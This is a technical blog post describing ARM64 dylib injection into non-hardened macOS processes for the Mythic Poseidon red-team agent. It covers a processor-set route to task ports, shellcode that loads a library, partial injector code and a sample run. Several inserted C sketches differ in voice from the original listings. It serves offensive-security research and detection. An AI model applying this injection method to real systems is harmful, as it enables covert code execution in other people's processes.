ARM-ed and Dangerous: Dylib Injection on macOS
Aug 21 2025
By: West Shepherd • 24 min read
Modern Dylib Injection Techniques for AArch64 macOS
TL;DR This post details how I extended the Mythic Poseidon agent to support ARM64 Dylib injection on Apple Silicon. The method leverages Mach APIs to enumerate processor sets, obtain task ports, and inject ARM64 shellcode that loads dynamic libraries (i.e., Dylibs) into non-hardened macOS processes. Full technical details are provided, including shellcode construction, memory allocation, runtime patching, and thread creation. Readers will gain insight into working around task_for_pid() restrictions with processor set enumeration and how defenders can detect these techniques in the wild.
Introduction
Modern macOS security controls have significantly raised the bar for process injection. Features like System Integrity Protection (SIP), Hardened Runtime, and Pointer Authentication Codes (PAC) enforce restrictions that block most familiar techniques. These defenses make it nearly impossible to inject into hardened applications, yet one method remains effective for certain non-hardened targets. Dylib injection using Mach ports still offers a practical approach under specific conditions.
In this post, I share how I extended the Poseidon agent for Mythic to support Dylib injection on Apple Silicon. The original macOS agent only included Dylib injection functionality for Intel (AMD64) platforms. To achieve parity on AArch64, I implemented the same injection logic and developed a shellcode stager in ARM64 assembly. This post walks through the technical details, from understanding the Mach API to implementing the injection process step by step.
The Dylib Injection Technique
Before diving into the specifics of ARM64 support, it is important to revisit the core concept of Dylib injection. This technique enables dynamic modification of a running process by loading an external shared library into its memory space.
The injection process involves three primary steps: allocating memory within the target process, creating a new thread, and deploying shellcode that carries out the actual loading of the Dylib. While these steps are similar to Poseidon’s AMD64 implementation, adding ARM64 support introduced new challenges, particularly around architectural differences and calling conventions.
With this foundation established, we can now examine the Mach primitives that make this possible on macOS.
Understanding the Mach Context
The Mach kernel forms the backbone of macOS process management. It provides abstractions like tasks and ports that enable inter-process communication and memory manipulation. A task represents a kernel-level execution environment for a process, and ports are kernel-managed communication channels for exchanging messages.
To perform Dylib injection, we need access to the target task’s port. The task_for_pid() API was historically the go-to solution for obtaining this access. However, SIP now enforces strict limitations, allowing its use only by processes with specific entitlements and Apple signatures.
Instead, we leverage a less common approach. By using host-level privileges, we can enumerate processor sets and retrieve task ports indirectly. This method avoids SIP’s direct enforcement while enabling the use of functions like mach_vm_write() and thread_create_running() later in the injection process.
Having outlined the necessary Mach context, the next step is to prepare a suitable environment for building and testing the injection logic.
Environment and Setup
If you already have an environment set up, feel free to skip to the next section.
Developing and testing this injection technique requires a controlled environment. For this walkthrough, I used a Mac mini running macOS 15 (Sequoia). SIP was enabled to simulate realistic conditions, and Gatekeeper was temporarily disabled to allow testing of unsigned binaries. However, it’s worth noting that Gatekeeper will allow ad-hoc signed binaries to run if they are signed locally on the macOS system, which can be a safer alternative to disabling Gatekeeper entirely (e.g., codesign -f -s - ./binary).
The setup also requires Xcode, along with Homebrew’s binutils and coreutils packages. Root access is necessary throughout the process to perform operations like memory allocation and thread creation in a remote process.
With the environment ready, we can move on to creating a test Dylib that serves as the payload for injection.
Creating the Test Dylib
The test Dylib provides a simple way to confirm successful injection. Its purpose is to perform an observable action upon loading, verifying that the injection worked as intended. The following code defines inject_dylib.c.
#include <stdio.h> |
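As a rough illustration of what such a payload can look like, the sketch below uses a constructor function that runs when the library is loaded and creates a marker file. It is an assumption-based example, not the original inject_dylib.c; the function name on_load is hypothetical, and the marker path is chosen to match the artifact checked later in this post.

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Marker path assumed from the verification step later in the post. */
#define MARKER_PATH "/tmp/injected_success"

/* Runs automatically when the library is loaded, for example via dlopen(). */
__attribute__((constructor))
static void on_load(void)
{
    /* Create (or truncate) an empty marker file as the observable action. */
    int fd = open(MARKER_PATH, O_CREAT | O_WRONLY | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open marker");
        return;
    }
    close(fd);
}
```

A file on disk is used here because it is easy to check from a separate shell once the loader has run the constructor.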
Compile the Dylib using the following clang command.
admin@[libinject]> clang -shared \
    -o inject_dylib.dylib inject_dylib.c \
    -framework Foundation \
    -arch arm64 -fPIC
With the Dylib compiled, we need a target process for testing the injection.
Creating a Persistent Test Process
To simplify testing, we will create a lightweight application named inject_target.c. This application runs indefinitely, making it an ideal target for demonstrating injection.
#include <stdio.h> |
Next, compile the test application.
admin@[libinject]> clang -o inject_target inject_target.c
admin@[libinject]> file inject_target
inject_target: Mach-O 64-bit executable arm64
With both the test Dylib and target process prepared, we can now explore the ARM64 shellcode that performs the actual injection.
ARM64 Shellcode
This shellcode replicates Poseidon’s AMD64 functionality for Apple Silicon. It carries out three operations entirely in memory: spawning a new thread, loading the Dylib, and terminating the thread.
The shellcode was written in ARM64 assembly to account for architectural differences such as register usage and calling conventions. Let’s break it down step by step.
Shellcode Breakdown
The ARM64 shellcode begins with a prologue that prepares the stack and preserves critical registers. This setup ensures that subsequent operations maintain proper alignment and do not disrupt the calling conventions of the target process.
.global _main |
Thread Creation
After setting up the stack, the shellcode prepares arguments for pthread_create_from_mach_thread(). This function creates a new thread within the target process. The thread executes a secondary routine called _start_routine.
; === Prepare Arguments for pthread_create_from_mach_thread === |
After creating the thread, the shellcode enters an infinite loop. This prevents the main thread from returning and allows the injected thread to execute independently.
_jump: |
The _start_routine function carries out the actual work of loading the Dylib. It calls dlopen() to load the specified library, then terminates cleanly using pthread_exit().
_start_routine: |
To support dynamic behavior, we use the data section to store the shellcode placeholders PTHRDCRT, DLOPEN__, PTHREXIT__, and LIBLIBLIB. These are patched at runtime with resolved function addresses and the actual Dylib path.
; === Data Section === |
With the shellcode logic understood, we can now examine how it is compiled and integrated into the injection process.
Generating Shellcode Bytes
Once written, the shellcode must be assembled and converted into a format that the injection code can use. The following commands assemble the shellcode, link it into a binary, extract raw bytes, and format them as a C-compatible array.
admin@[libinject]> as -arch arm64 shellcode.asm -o shellcode.o && \ |
This process produces a flat text file of hexadecimal opcodes. These opcodes are imported into the C code as a static template called shellcode_template.
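The final formatting step can also be done in C. The sketch below is one possible way to turn raw bytes into \xNN escapes suitable for pasting into a C string literal; the function name bytes_to_c_escapes is hypothetical and is not part of the post's toolchain.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * Write `len` raw bytes into `out` as "\xNN" escapes and NUL-terminate.
 * Returns the number of characters written (excluding the NUL), or 0 if
 * `out_size` is too small to hold the result.
 */
size_t bytes_to_c_escapes(const unsigned char *bytes, size_t len,
                          char *out, size_t out_size)
{
    size_t needed = len * 4 + 1; /* 4 characters per byte plus terminator */
    if (out_size < needed) {
        return 0;
    }
    for (size_t i = 0; i < len; i++) {
        /* Each call writes exactly 4 characters and a temporary NUL. */
        snprintf(out + i * 4, 5, "\\x%02x", bytes[i]);
    }
    out[len * 4] = '\0';
    return len * 4;
}
```

For example, the four bytes of an ARM64 NOP instruction (1f 20 03 d5 in memory order) would come out as the text \x1f\x20\x03\xd5.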
By using a template that is copied and patched during each injection, we avoid reusing modified shellcode. Reuse could lead to corrupted placeholders and unpredictable results.
Implementing the Shellcode in C
The final product is the C shellcode array shellcode_template, which serves as a base for the injection payload. It contains the compiled ARM64 opcodes, along with placeholder strings for function pointers and the Dylib path.
char shellcode_template[] = |
During runtime, the injector searches for these placeholders in memory and replaces them with actual addresses and strings. This ensures the shellcode operates correctly within the target process.
Having covered the shellcode implementation, we can now shift focus to the injection process itself.
Dylib Injection Exploit Code
Replicating Task for PID
The injection routine (libinject_darwin_arm64.c) begins with the challenge of obtaining a task port for the target process. Since SIP blocks task_for_pid() unless the binary has Apple entitlements, the injector uses a custom task_for_pid_wrapper() function. This function takes an indirect approach, relying on processor set enumeration and host-level privileges to retrieve task ports.
Obtaining the Host Privileged Port
The first step is to retrieve the host privileged port using host_get_host_priv_port(). This port is required for advanced Mach-based system queries and is only available to processes running as root or signed with specific entitlements, such as com.apple.private.kernel.system-task-access, com.apple.private.mach-priv, or com.apple.system-task-ports.
host_t host_priv; |
Getting the Default Processor Set
Processor sets are kernel objects that group CPUs and their associated tasks. Once the host privileged port is available, the injector calls processor_set_default() to obtain a handle to the system’s default processor set.
mach_port_t ps_default; |
Enumerating Processor Sets
The injector then uses host_processor_sets() to retrieve a list of all processor sets on the system. This enumeration provides entry points for later task enumeration.
processor_set_name_array_t *psets = malloc(1024); |
Obtaining Privileges Over the Processor Set
To enumerate the tasks within a processor set, the injector calls host_processor_set_priv() to request control access to the default processor set. This step is critical because it enables the use of processor_set_tasks().
mach_port_t ps_default_control; |
Retrieving All Task Ports
With control access granted, the injector uses processor_set_tasks() to obtain an array of task ports for all processes in the system. Unlike task_for_pid(), this method is not subject to SIP’s direct enforcement.
mach_msg_type_number_t num_tasks; |
The tasks array now contains task ports for every process.
Matching the Target Process
The injector iterates over the retrieved task ports and uses pid_for_task() to compare each task’s PID to the target PID. When a match is found, the corresponding task port is returned.
for (int i = 0; i < num_tasks; i++) { |
This sequence effectively replicates the functionality of task_for_pid() without requiring Apple’s entitlements.
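Put together, the lookup can be sketched as a single function. This is a condensed illustration under stated assumptions, not the post's task_for_pid_wrapper(): the name task_port_via_pset is hypothetical, only the default processor set is consulted, error handling is minimal, and the non-Apple branch exists only so the sketch compiles on other platforms.

```c
#include <stddef.h>

#if defined(__APPLE__)
#include <mach/mach.h>
#else
typedef unsigned int mach_port_t; /* stand-in so the sketch builds elsewhere */
#endif

/*
 * Find the task port for `pid` by walking the default processor set.
 * Returns 0 and stores the port in *task_out on success, -1 otherwise.
 * Assumes the caller is running as root on macOS.
 */
int task_port_via_pset(int pid, mach_port_t *task_out)
{
#if defined(__APPLE__)
    host_priv_t host_priv = MACH_PORT_NULL;
    processor_set_name_t pset_name = MACH_PORT_NULL;
    processor_set_t pset_ctl = MACH_PORT_NULL;
    task_array_t tasks = NULL;
    mach_msg_type_number_t count = 0;
    int found = -1;

    if (host_get_host_priv_port(mach_host_self(), &host_priv) != KERN_SUCCESS ||
        processor_set_default(host_priv, &pset_name) != KERN_SUCCESS ||
        host_processor_set_priv(host_priv, pset_name, &pset_ctl) != KERN_SUCCESS ||
        processor_set_tasks(pset_ctl, &tasks, &count) != KERN_SUCCESS) {
        return -1;
    }

    for (mach_msg_type_number_t i = 0; i < count; i++) {
        int task_pid = -1;
        if (found != 0 &&
            pid_for_task(tasks[i], &task_pid) == KERN_SUCCESS &&
            task_pid == pid) {
            *task_out = tasks[i]; /* keep the matching send right */
            found = 0;
        } else {
            /* Release every port we are not going to use. */
            mach_port_deallocate(mach_task_self(), tasks[i]);
        }
    }
    /* The array itself is out-of-line memory that the caller must free. */
    vm_deallocate(mach_task_self(), (vm_address_t)tasks,
                  count * sizeof(task_t));
    return found;
#else
    (void)pid;
    (void)task_out;
    return -1; /* Mach APIs are not available off macOS */
#endif
}
```

Releasing the unused ports and the returned array keeps the injector from leaking a send right for every task on the system each time it runs.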
Why This Approach Works Despite SIP
Although SIP blocks task_for_pid() for protected processes, it does not impose equivalent restrictions on querying processor sets. By first obtaining host privileges, the injector accesses a more permissive control path to enumerate tasks and identify the one associated with the target PID.
This method does not bypass SIP entirely. Instead, it exploits the fact that processor set APIs remain exposed to processes running as root.
Mach-O Manipulation
With the task port for the target process secured, the next phase focuses on preparing the memory space for the injection payload. This involves allocating memory regions within the target process, configuring them appropriately, and writing the ARM64 shellcode. Proper alignment and protection settings are critical here to avoid crashing the target or triggering security mechanisms.
Allocating Memory in the Target Process
Once the target task port is obtained, the injector allocates memory in the remote process. Two regions are allocated: one for the shellcode and one for the thread’s stack. Both allocations use mach_vm_allocate() with the VM_FLAGS_ANYWHERE flag, allowing the kernel to select suitable addresses.
mach_vm_address_t remote_stack = 0; |
The allocated stack is sized at 0x4000 bytes, which is sufficient for the minimal operations the injected thread performs.
Resolving Function Addresses
The injector resolves the addresses of critical functions at runtime. These functions include pthread_create_from_mach_thread(), dlopen(), and pthread_exit(). Resolved pointers are later used to patch the placeholders in the shellcode template.
uint64_t addr_of_pthread = (uint64_t)dlsym( |
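If any of these lookups fail, the injector aborts to avoid corrupting the remote process with invalid addresses. Note that the addresses are resolved in the injector's own address space; they are expected to be valid in the target as well because system libraries are mapped from the dyld shared cache at the same addresses across processes of the same architecture for a given boot.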
Patching the Shellcode Template
With function addresses resolved, the injector allocates a fresh copy of the shellcode_template array, then searches for placeholders within the array. Each placeholder is replaced with the corresponding function pointer or the full path to the target Dylib.
size_t shellcode_size = sizeof(shellcode_template); |
This dynamic patching ensures that the shellcode has accurate references for the current process and Dylib being injected.
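The copy-then-patch step can be sketched in portable C. The helpers below are hypothetical names written for illustration, not functions from libinject_darwin_arm64.c. They assume each address placeholder has at least 8 bytes available, and that the path placeholder sits in a fixed-size slot whose size the caller knows (the slot size is an assumption, since the template's layout is not shown here).

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Return a heap copy of the template so the static original stays pristine. */
unsigned char *copy_template(const unsigned char *tmpl, size_t len)
{
    unsigned char *copy = malloc(len);
    if (copy != NULL) {
        memcpy(copy, tmpl, len);
    }
    return copy;
}

/* Locate the first occurrence of `marker` in buf, or return NULL. */
static unsigned char *find_marker(unsigned char *buf, size_t len,
                                  const char *marker)
{
    size_t mlen = strlen(marker);
    if (mlen == 0 || mlen > len) {
        return NULL;
    }
    for (size_t i = 0; i + mlen <= len; i++) {
        if (memcmp(buf + i, marker, mlen) == 0) {
            return buf + i;
        }
    }
    return NULL;
}

/* Overwrite the 8 bytes starting at `marker` with a 64-bit address. */
int patch_address(unsigned char *buf, size_t len, const char *marker,
                  uint64_t addr)
{
    unsigned char *slot = find_marker(buf, len, marker);
    if (slot == NULL || (size_t)(buf + len - slot) < sizeof(addr)) {
        return -1;
    }
    /* Host byte order, which is little-endian on arm64 macOS. */
    memcpy(slot, &addr, sizeof(addr));
    return 0;
}

/* Replace a path marker with `path`, zero-filling the rest of the slot. */
int patch_path(unsigned char *buf, size_t len, const char *marker,
               size_t slot_size, const char *path)
{
    unsigned char *slot = find_marker(buf, len, marker);
    if (slot == NULL || (size_t)(buf + len - slot) < slot_size ||
        strlen(path) + 1 > slot_size) {
        return -1;
    }
    memset(slot, 0, slot_size);
    memcpy(slot, path, strlen(path));
    return 0;
}
```

Because a patched placeholder no longer matches its marker, a second attempt to patch the same buffer fails, which is one reason to start every injection from a fresh copy of the template.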
Writing the Shellcode to the Target Process
After patching, the injector writes the modified shellcode into the allocated memory region of the target process using mach_vm_write().
printf("[+] Writing shellcode to memory\n"); |
Set Memory Protections for Execution and Stack Use
To prepare the shellcode for execution, the memory protections of the code and stack regions are updated. The code region is marked read and execute (RX), while the stack region is set to read and write (RW).
printf("[+] Setting code region to RX permissions\n"); |
These protections are critical because macOS blocks executing shellcode from a writable memory region on hardened processes.
Launching the Remote Thread
The final step involves creating a new thread in the target process that begins execution at the shellcode entry point. This is done using thread_create_running().
printf("[i] Setting remote registers\n"); |
At this point, the new thread is active within the target process and executes the ARM64 shellcode, which spawns another thread to load the Dylib.
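The register values set for the new thread are not spelled out in this walkthrough. One common convention in injectors of this kind, assumed here rather than taken from the post's source, is to point the stack pointer at the middle of the allocated stack region and keep it 16-byte aligned, which AArch64 requires at function calls. The helper name initial_stack_pointer is hypothetical.

```c
#include <stdint.h>

/* AArch64 expects the stack pointer to be 16-byte aligned. */
#define STACK_ALIGN 16u

/*
 * Pick a starting stack pointer inside [stack_base, stack_base + stack_size).
 * Starting mid-region leaves room on both sides; the result is rounded down
 * to the required alignment. Assumes stack_base is itself at least 16-byte
 * aligned, as page-aligned Mach allocations are.
 */
uint64_t initial_stack_pointer(uint64_t stack_base, uint64_t stack_size)
{
    uint64_t sp = stack_base + stack_size / 2;
    return sp & ~(uint64_t)(STACK_ALIGN - 1);
}
```

With a 0x4000-byte stack, this places the starting stack pointer 0x2000 bytes above the base of the region.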
Payload Execution
With the injection routine in place, the next step is to test it against the persistent test process. Start by launching the target application in the background. This process will run indefinitely, waiting for the injection to occur.
admin@[libinject]> ./inject_target &
[4] 79530
admin@[libinject]> [+] Test process started. PID: 79530
Once the target process is running, compile and then invoke the injector binary as root. Pass the process ID (PID) of the target application and the full path to the test Dylib.
The injector will display status messages as it progresses through key stages such as task port acquisition, memory allocation, shellcode patching, and thread creation.
admin@[libinject]> clang libinject_darwin_arm64.c -framework Foundation \
[+] Running libinject_darwin_arm64
[+] Got task=8195 for pid=79530
[+] Stack allocated at address: 0x1025c0000
[+] Code allocated at address: 0x1025d0000
[+] Patching shellcode
[+] Patched pthread_create_from_mach_thread() with address: 0x187d39b28
[+] Patched dlopen() with address: 0x187d404f4
[+] Patched pthread_exit() with address: 0x187d35954
[+] Patched library with path: /tmp/inject_dylib.dylib
[+] Shellcode patched
[+] Writing shellcode to memory
[+] Shellcode written to address: 0x1025d0000
[+] Setting code region to RX permissions
[+] Setting stack region to RW permissions
[i] Setting remote registers
[+] Spawning thread
[+] Finished injecting into pid=79530 with dylib=/tmp/inject_dylib.dylib
[+] Injection successful!
admin@[libinject]> [+] Successfully injected into process! the PID: 79530
After the injection completes, confirm that the test Dylib executed successfully by checking for the artifact its constructor created.
admin@[libinject]> ls /tmp/injected_success
/tmp/injected_success
If the file exists, it confirms that the Dylib was loaded into the target process and executed as intended.
Detection
Although this injection technique avoids using task_for_pid() and does not leave shellcode binaries on disk, it is not fully stealthy. The injected Dylib must exist on disk for dlopen() to load it. This requirement creates opportunities for defenders to detect unauthorized activity.
Apple’s Hardened Runtime and SIP protections already block unsigned Dylibs from loading into hardened processes. Ensuring these defenses are enabled, along with enforcing strict code signing policies, provides strong mitigation against this technique.
Conclusion
ARM64 Dylib injection on macOS demonstrates both the power of Mach APIs and the persistent challenges of securing dynamic operating systems. Apple’s ongoing improvements to SIP and code signing have raised the bar for attackers, but non-hardened applications remain exposed.
For red team operators, this technique provides a practical method of gaining code execution on non-hardened targets in Apple Silicon environments. For defenders, understanding the mechanics of this injection process is essential to detecting and mitigating similar threats in the wild.
Shout Out
Special thanks to Angelo DeLuca and Erhad Husovic from NSoft for their excellent work on the ReverseApple project, which provided valuable insight into ARM64 injection techniques. Additional credit goes to Leo Pitt for the blog post “Dylib Loads that Tickle Your Fancy,” Cody Thomas, and to Chris Ross for his foundational work on the Poseidon agent. Their contributions helped shape the direction of this research.
References / Resources
- L. Pitt, “Dylib Loads That Tickle Your Fancy,” SpecterOps, Aug. 2022. [Online]. Available: https://posts.specterops.io/dylib-loads-that-tickle-your-fancy-d25196addd8c
- Apple Inc., “Apple Developer Documentation.” [Online]. Available: https://developer.apple.com/documentation/
- Apple Inc., “Mach-O Programming Guide.” [Online]. Available: https://developer.apple.com/library/archive/documentation/
- W. Shepherd, “libinject_darwin_arm64.c,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/f792cac61a1b51d3d96ade6a917819ff
- W. Shepherd, “libinject_darwin_arm64.h,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/cfcb9ecf7f9e2aa96e5884a0526ccba7
- Mythic – Poseidon Agent on AMD64 macOS, SpecterOps. [Online]. Available: https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agent_code/libinject/libinject_darwin_amd64.c
- A. DeLuca and E. Husovic, “inject_aarch64,” NSoft, GitHub Repository, 2023. [Online]. Available: https://github.com/ReverseApple/inject_aarch64